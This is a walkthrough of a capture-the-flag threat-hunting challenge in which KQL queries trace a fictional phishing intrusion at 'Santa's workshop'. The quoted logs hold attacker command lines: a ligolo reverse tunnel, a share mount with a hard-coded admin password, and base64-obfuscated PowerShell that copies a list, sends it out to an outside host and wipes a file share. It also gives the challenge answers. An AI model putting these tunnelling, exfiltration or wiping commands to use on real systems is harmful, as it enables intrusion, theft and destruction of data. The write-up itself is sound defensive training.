Skip to content

KQL Kraken Hunt⚓︎

Difficulty:
Direct link: https://detective.kusto.io/sans2023

Objective⚓︎

Request

Use Azure Data Explorer to uncover misdeeds in Santa's IT enterprise. Go to Film Noir Island and talk to Tangle Coalbox for more information.

Tangle Coalbox

Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here.
I've got a network infection case on Film Noir Island that needs your expertise.
Seems like someone clicked a phishing link within a client's organization, and trouble's brewing.
I'm swamped with cases, so I need an extra pair of hands. You up for the challenge?
You'll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this incident.
Before you start, you'll need to create a free cluster.
Keep your eyes peeled for suspicious activity, IP addresses, and patterns that'll help us crack this case wide open.
Remember, kid, time is of the essence. The sooner we can resolve this issue, the better.
If you run into any problems, just give me a holler, I've got your back.
Good hunting, and let's bring this cyber criminal to justice.
Once you've got the intel we need, report back and we'll plan our next move. Stay sharp, rookie.

Hints⚓︎

Outbound Connections

From: Tangle Coalbox

Do you need to find something that happened via a process? Pay attention to the ProcessEvents table!

KQL Tutorial

From: Tangle Coalbox

Once you get into the Kusto trainer, click the blue Train me for the case button to get familiar with KQL.

File Creation

From: Tangle Coalbox

Looking for a file that was created on a victim system? Don't forget the FileCreationEvents table.

Solution⚓︎

We set up a Kusto cluster on dataexplorer.azure.com. The challenge's mechanisms provide databases to our cluster, which we explore to solve 6 cases:

Onboarding⚓︎

How many Craftperson Elf's are working from laptops?

Query:

Employees | where role == "Craftsperson Elf" | where hostname has "LAPTOP" | count

25

Case 1: Welcome to Operation Giftwrap: Defending the Geese Island network⚓︎

Intro text

An urgent alert has just come in, 'A user clicked through to a potentially malicious URL involving one user.' This message hints at a possible security incident, leaving us with critical questions about the user's intentions, the nature of the threat, and the potential risks to Santa's operations. Your mission is to lead our security operations team, investigate the incident, uncover the motives behind email, assess the potential threats, and safeguard the operations from the looming cyber threat.

The clock is ticking, and the stakes are high - are you up for this exhilarating challenge? Your skills will be put to the test, and the future of Geese Island's digital security hangs in the balance. Good luck!

The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

What is the email address of the employee who received this phishing email?

Query:

Email
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx""

"timestamp": 2023-12-02T09:37:40Z,
"sender": cwombley@gmail.com,
"reply_to": cwombley@gmail.com,
"recipient": alabaster_snowball@santaworkshopgeeseislands.org,
"subject": [EXTERNAL] Invoice foir reindeer food past due,
"verdict": CLEAN,
"link": http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx

Answer: alabaster_snowball@santaworkshopgeeseislands.org

What is the email address that was used to send this spear phishing email?

Answer: cwombley@gmail.com

What was the subject line used in the spear phishing email?

Answer: [EXTERNAL] Invoice foir reindeer food past due

Case 2: Someone got phished! Let's dig deeper on the victim...⚓︎

Nicely done! You found evidence of the spear phishing email targeting someone in our organization. Now, we need to learn more about who the victim is! If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!

What is the role of our victim in the organization?

Query:

Employees
| where email_addr == "alabaster_snowball@santaworkshopgeeseislands.org"
| project role,hostname, ip_addr

"role": Head Elf,
"hostname": Y1US-DESKTOP,
"ip_addr": 10.10.0.4

Answer: Head Elf

What is the hostname of the victim's machine?

Answer: Y1US-DESKTOP

What is the source IP linked to the victim?

Answer: 10.10.0.4

Case 3: That's not good. What happened next?⚓︎

Intro text

The victim is Alabaster Snowball? Oh no... that's not good at all! Can you try to find what else the attackers might have done after they sent Alabaster the phishing email? Use our various security log datasources to uncover more details about what happened to Alabaster.

What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!

Query:

OutboundNetworkEvents
| where url == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
| project timestamp

2023-12-02T10:12:42Z

What file is dropped to Alabaster's machine shortly after he downloads the malicious file?

Query:

let T0=datetime("2023-12-02T10:12:42Z");
Email 
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
| join kind=inner Employees on $left.recipient==$right.email_addr
| project hostname
| join kind=inner FileCreationEvents on hostname
| where timestamp between(T0 .. 10m)
| project timestamp, filename

timestamp filename
2023-12-02T10:13:35Z MonthlyInvoiceForReindeerFood.docx
2023-12-02T10:14:21Z giftwrap.exe

Answer: giftwrap.exe

Case 4: A compromised host! Time for a deep dive.⚓︎

Intro text

Well, that's not good. It looks like Alabaster clicked on the link and downloaded a suspicious file. I don't know exactly what giftwrap.exe does, but it seems bad.

Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!

The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?

Query:

let T1=datetime("2023-12-02T10:14:21Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp between(T1 ..300m)
| project process_commandline
  C:\Windows\system32\DllHost.exe /Processid:{45BA127D-10A8-46EA-8AB7-56EA9078943C}
  C:\Windows\Sysmon64.exe
  C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -f "C:\ProgramData\NVIDIA\NvContainerUser%d.log" -d 
  "ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof
  "C:\Windows\System32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-2449965632-1733627164-4233550561-100134_ 
  "C:\Program Files\winlogbeat-6.0.0-windows-x86_64\\winlogbeat.exe" -c "C:\Program Files\winlogbeat-6.0.0-windows-x86_64\\winlogbeat.yml" -path.home "C:\Program Files\winlogbeat-6.0.0-windows-x86_64" -path.data "C:\\ProgramData\\winlogbeat" -path.logs "C:\\ProgramData\\winlogbeat\logs"
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  netstat
  ipconfig
  "C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.190.859.0_x86__zpdnekdrzrea0\Spotify.exe" --type=crashpad-handler /prefetch:7

Answer: 113.37.9.17

The 4th result line shows the start of "ligolo", a reverse tunnelling software. The "-to" parameter indicates the address to which the connection was forwarded.

What is the timestamp when the attackers enumerated network shares on the machine?

Query:

let T1=datetime("2023-12-02T10:14:21Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp between(T1 ..600m)
| project timestamp, process_commandline

In the output, we find this:

  "timestamp": 2023-12-02T16:51:44Z,
  "process_commandline": net share

Answer: 2023-12-02T16:51:44Z

What was the hostname of the system the attacker moved laterally to?

Query:

let T1=datetime("2023-12-02T10:12:42.000Z");
ProcessEvents
| where username == "alsnowball" and timestamp > T1
| project timestamp, process_commandline

We encounter this:

  "timestamp": 2023-12-24T15:14:25Z,
  "process_commandline": cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123

Answer: NorthPolefileshare

Risk of misunderstanding

I had long disregarded this as a possible answer. In my understanding, "lateral movement" involves some compromise, taking some kind of control of another system. Simply using a service that the system is meant to offer would not really fall into my (limited) category.

Case 5: A hidden message⚓︎

Intro text

Wow, you're unstoppable! Great work finding the malicious activity on Alabaster's machine. I've been looking a bit myself and... I'm stuck. The messages seem to be garbled. Do you think you can try to decode them and find out what's happening?

Look around for encoded commands. Use your skills to decode them and find the true meaning of the attacker's intent! Some of these might be extra tricky and require extra steps to fully decode! Good luck!

If you need some extra help with base64 encoding and decoding, click on the 'Train me for this case' button at the top-right of your screen.

When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?

Query:

let T1=datetime("2023-12-02T10:12:42.000Z");
ProcessEvents
| where hostname == "Y1US-DESKTOP" and timestamp > T1
| where process_commandline contains "-enc"
| project timestamp, process_commandline

The flag "-enc" is used in Powershell to specify base64-encodes commands. This query gives us 4 hits:

   "timestamp": 2023-12-15T11:20:14Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc SW52b2tlLVdtaU1ldGhvZCAtQ29tcHV0ZXJOYW1lICRTZXJ2ZXIgLUNsYXNzIENDTV9Tb2Z0d2FyZVVwZGF0ZXNNYW5hZ2VyIC1OYW1lIEluc3RhbGxVcGRhdGVzIC0gQXJndW1lbnRMaXN0ICgsICRQZW5kaW5nVXBkYXRlTGlzdCkgLU5hbWVzcGFjZSByb290WyZjY20mXWNsaWVudHNkayB8IE91dC1OdWxs"


   "timestamp": 2023-12-24T16:07:47Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn


   timestamp": 2023-12-24T16:58:43Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=

   "timestamp": 2023-12-25T10:44:27Z,
   "process_commandline": C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=

However, the first one is benign; the decoded commands read

Invoke-WmiMethod -ComputerName $Server -Class CCM_SoftwareUpdatesManager -Name InstallUpdates - ArgumentList (, $PendingUpdateList) -Namespace root[&ccm&]clientsdk | Out-Null

This looks like a software update, not something one would assume attackers would perform in this situation.

So the answer is the timestamp of the second hit:

Answer: 2023-12-24T16:07:47Z

What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)

The second powershell command decodes as

  ( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''

The string 'txt.tsiLeciNythguaN\potkseD:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\ metI-ypoC c- exe.llehsrewop' obviously is reversed; reversing it again gives 'powershell.exe -c Copy-Item \NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt'

Answer: NaughtyNiceList.txt

The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?

The 3rd base64 string gives

  [StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN

Unwilling to install power shell, we use a small python script to create a string from what looks like ASCII code numbers:

Decoder for ASCII Code
1
2
3
4
5
6
#!/usr/bin/python3

a=[100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101]

for n in a:
    print(chr(n), end='')
Running it shows

  downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file

Answer: giftbox.com

Case 6: The final step!⚓︎

Intro text

Wow! You decoded those secret messages with easy! You're a rockstar. It seems like we're getting near the end of this investigation, but we need your help with one more thing... We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

What is the name of the executable the attackers used in the final malicious command?

We look at the decoded 4th base64 string:

  C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$

Answer: downwithsanta.exe

What was the command line flag used alongside this executable?

Answer: --wipeall

Congratulations!⚓︎

Intro text

Congratulations, you've cracked the Kusto detective agency section of the Holiday Hack Challenge!

By now, you've likely pieced together the broader narrative of the alert we received. It all started with Wombley Cube, a skilled Craftsperson, and a malicious insider, who sent an email to the esteemed head elf, Alabaster Snowball. This seemingly innocent email contained a dangerous link leading to the malicious domain, MadElvesNorthPole.org. Alabaster Snowball, from his PC, unwittingly clicked on the link, resulting in the download and execution of malicious payloads. Notably, you've also discerned Wombley Cube's ulterior motive: to pilfer a copy of Santa's naughty or nice list and erase the data on the share drive containing critical information to Santa's operations. Kudos to you!

To earn credit for your fantastic work, return to the Holiday Hack Challenge and enter the secret phrase which is the result of running this query:

print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')

Running this in the Azure Data Explorer shows

Beware the Cube that Wombles

Images⚓︎

We even got two awards:

awards

Final Answer

Beware the Cube that Wombles

Response⚓︎

Tangle Coalbox

I had my doubts, but you've proven your worth.
That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess.
So long, Gumshoe, and be careful out there.